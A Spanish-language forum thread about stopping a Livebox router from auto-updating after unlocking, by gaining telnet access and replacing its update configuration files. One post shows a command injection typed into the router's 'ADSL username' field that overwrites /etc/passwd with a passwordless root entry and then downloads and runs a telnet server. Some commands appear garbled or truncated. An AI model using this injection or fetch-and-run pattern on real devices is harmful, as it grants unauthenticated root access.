Ir al contenido
Conéctate para seguir esto  
osiele

EVITAR QUE TU LIVEBOX SE ACTUALICE AUTOMATICAMENTE

Publicaciones recomendadas

Buenas:

He referido esta incidencia en varios temas de este foro. Le LIVEBOX tras ser liberado se sigue actualizando automaticamente por lo que perdemos el desbloqueo y configuracion para otro ISP diferente a ORANGE. ¿Como se soluciona?

Pues investigando un poco y con el aporte de un compañero de este foro he encontrado algo... pero no consigo enterder muy bien lo que hay que hacer.

La web donde he obtenido la informacion es: http://www.agp.dsl.pipex.com/inventel.html

Justo al final de esta pagina nos dice lo siguiente...traducido con programa googletranslator.

IMPORTANTE: supuestamente esto hay que hacerlo cuando conseguimos hacer telnet al ROUTER, cuando podemos conseguir el parametro h235_key:

----Stop llamando a casa. He hecho cambios en / etc / autoconf.conf cambiando CONFIG_DEFAULT_UPDATE_MACHINE = "10.0.0.242" en lugar de "developers.inventel.com" y / / firm.conf etc cambiando UPDATE_MACHINE = 10.0.0.242 lugar de developers.inventel. com. Extraje estos archivos de la imagen del firmware pertinentes, modificada por ellos y luego copiar hacia abajo usando wget. Usted puede usar 'sed' de hacer los cambios en la forma siguiente desde una consola del sistema,

cat / etc / | autoconf.conf sed 's / developers.inventel.com / your.server.ip.address /'> / var / autoconf.conf

rm / etc / autoconf.conf

mv / var / autoconf.conf / etc / autoconf.conf

cat / etc / autoconf.conf y compruebe que el cambio se ha realizado.

¿Los mismos cambios en / etc / firm.conf y verifique el contenido. Esto parece haber funcionado y se detuvo a las actualizaciones automáticas del firmware de la web Inventel.

Bueno, hay queda eso. La verdad es que no entiendo gran cosa de lo que pone aqui... Con un poco de paciencia voy a probar que pasa... lo que ocurre es que yo actualmente tengo internet con ONO (por cable), y no puedo probar el resultado... si alguien que tenga conexion con TELEFONICA u otro ISP ADSL fuera capaz de efectuar pruebas y publicar sus resultados seria de gran ayuda en este foro.

Si alguien puede aportar alguna otra solucion igualmente seria de gran ayuda.

Compartir este mensaje

Enlace al mensaje
Compartir en otros sitios web

Nuevos datos que no entiendo y que pueden conseguir que el router se actualice constantemente

El router tiene unos archivos llamados autoconf.conf y firm.conf que tienen una linea de comandos que son estos:

En autoconf.conf: CONFIG_DEFAULT_UPDATE_MACHINE = developers.inventel.com

En firm.conf: UPDATE_MACHINE = developers.inventel. com

Hay que cambiarles el valor "developer.inventel.com por otro diferente, por ejemplo tu IP u otra generica 1.0.0.1

En la web explican como hacerlo pero para mi es chino...

http://www.agp.dsl.pipex.com/inventel.html

Me parece entender que hay que crear una copia de seguridad y se crea un archivo llamado cfgsave.dw, luego modificar el archivo wifi.conf dentro de ella para usar wget para copiar un archivo de comandos de un servidor ftp y luego ejecutar el script "setup.sh" y cargara unos archivos que puedes descargarte y colgar en serv. ftp...

Alguna ayuda para entender esto!!

GRACIAS

Compartir este mensaje

Enlace al mensaje

Bueno, estoy intentando hacer algo para evitar la actualizacion.

Pero como no entiendo de LINUX es muy complicado para mi.

Por el momento parece que he conseguido algo, o eso parece.

He instado firmware frances v5.03.3-fr (ademas habilita el BLUETOOTH del router).

He encontrado tambien una forma mas sencilla de hacer TELNET al router:

Bien pues aki debemos poner la constraseña en blanco y en "Nombre de usuario ADSL" pondremos lo siguiente

Código:

;echo root::0:0:root:/root:/bin/sh >/etc/passwd ;cd /etc;wget ftp://10.0.0.2/u ;chmod 777 /etc/u

y Clikamos sobre "enviar". Esto hara que como root, descarge el servidor telnet renombrado a "u" desde el servidor ftp a "/etc" del router y le de permisos de ejecucion.

Cuando el navegador nos devuelva a la pagina de inicio, cambiaremos el "Nombre de usuario ADSL" por losiguiente:

Código:

;/etc/u -p 23 -l /bin/sh -d

Clikamos sobre "enviar" y al poco estara ya iniciado el servidor telnet. Ahora ya con un cliente telnet accederemos al BusyBox, del router.

Y ahora viene el lio, que no me entero de nada.

He conseguido unos archivos modificados que supuestamente hay que cambiar al router:

autoconf.conf, firm.conf, normal_boot

Los que permiten actualizar automaticamente son los dos primeros.

Pues ahora hay que instalarlos DE LA SIGUIENTE FORMA:

Hay que tener en la carpeta del servidor FTP introducidos los archivos autoconf.conf y firm.conf en una carpeta llamada “prívate”

Tras hacer telnet al router introducimos los siguiente:

SERVER_IP=10.0.0.2

SERVER_ROOTDIR=private

cd /etc

rm autoconf.conf

rm firm.conf

wget ftp://$SERVER_IP/$SERVER_ROOTDIR/$CONFI ... oconf.conf

wget ftp://$SERVER_IP/$SERVER_ROOTDIR/$CONFI ... /firm.conf

chmod 777 /etc/autoconf.conf

chmod 777 /etc/firm.conf

Si escribimos:

ls

nos aparecen los archivos que supuestamente estan instalados actualmente en el router. Tienen que apareces estos dos entre otros autoconf.conf y firm.conf

Si escribimos:

vi autoconf.conf y lo mismo con el otro archivo podremos ver si esta modificado la linea de comandoS

En autoconf.conf: CONFIG_DEFAULT_UPDATE_MACHINE = developers.inventel.com

En firm.conf: UPDATE_MACHINE = developers.inventel. com

En vez de developer.inventel.com tiene que poner otra cosa.

Bueno, si alguien puede ayudarme porque no lo puedo probar si funciona o no. Y ademas no se si queda instalado conrrectamente las modificaciones que hago.

Un saludo a todos.

Compartir este mensaje

Enlace al mensaje

ESTO ES LO IMPORTANTE PARA EVITAR LA ACTUALIZACION AUTOMATICA:

Despues de varias pruebas y buscar en muchas web, creo que esto resolvera la actualizacion automatica que el router hace cuando conecta a internet por ejemplo si lo usamos con TELEFONICA.

Antes hay que hacer downgrade al router al firmware 5.03.03fr.

Tambien debemos descargarnos los archivos autoconf.conf y firm.conf correspondientes al firmware que tenemos instalado. Los archivos están disponibles en la siguiente dirección de internet: http://www.agp.dsl.pipex.com/telnet_server.html

Estos archivos los introducimos una cartepa que llamaremos “prívate” dentro de nuestro servidor FTP (Yo he usado CEBERUS, tiene que terner permisos para conexión ANONIMA).

Despues de desbloquearlo o si ya lo tenemos desbloqueado tenemos que acceder por telnet al router.

Ahora introducimos los siguiente comandos

SERVER_IP=10.0.0.2 (la ip CAMBIALA por la que tengas al pc. NO LA DEL ROUTER)

SERVER_ROOTDIR=private

cd /etc

rm autoconf.conf

rm firm.conf

wget ftp://$SERVER_IP/$SERVER_ROOTDIR/$CONFI ... oconf.conf

wget ftp://$SERVER_IP/$SERVER_ROOTDIR/$CONFI ... /firm.conf

chmod 777 /etc/autoconf.conf

chmod 777 /etc/firm.conf

Con esto hemos conseguido eliminar los archivos originales y sustituirlo por unos modificados.

Esta modificacion se pierde si reseteais el router o actualizais firmware.

Esta pendiente de probar con una conexion real a TELEFONICA. Si alguien tiene la oportunidad y lo puede probar que publique sus resultado.

Un saludo a todos y espero que a alguien le sirva de ayuda esto.

Compartir este mensaje

Enlace al mensaje
Invitado
Este tema está cerrado a nuevas respuestas.
Conéctate para seguir esto  

• Crear nuevo...

Información importante

Términos de Uso Política de privacidad Hemos colocado cookies en su dispositivo para ayudar a mejorar este sitio web. Puedes ajustar la configuración de tus cookies ; de lo contrario, asumiremos que quieres continuar.